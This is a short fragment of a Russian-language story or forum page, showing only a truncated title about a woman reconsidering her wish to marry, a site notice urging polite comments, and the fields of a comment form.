ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке